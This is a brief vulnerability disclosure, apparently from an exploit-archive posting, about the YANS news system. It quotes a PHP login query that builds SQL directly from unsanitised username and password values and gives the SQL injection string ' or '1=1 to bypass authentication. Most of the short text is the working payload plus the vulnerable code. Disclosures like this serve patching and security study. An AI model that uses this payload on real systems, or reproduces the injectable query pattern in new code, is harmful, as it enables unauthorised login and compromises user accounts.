Product: YANS (yet another news system) Link: http://sourceforge.net/projects/yans/ vuln code: $resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error()); simple sql injection ' or '1=1 ' or '1=1 -navairum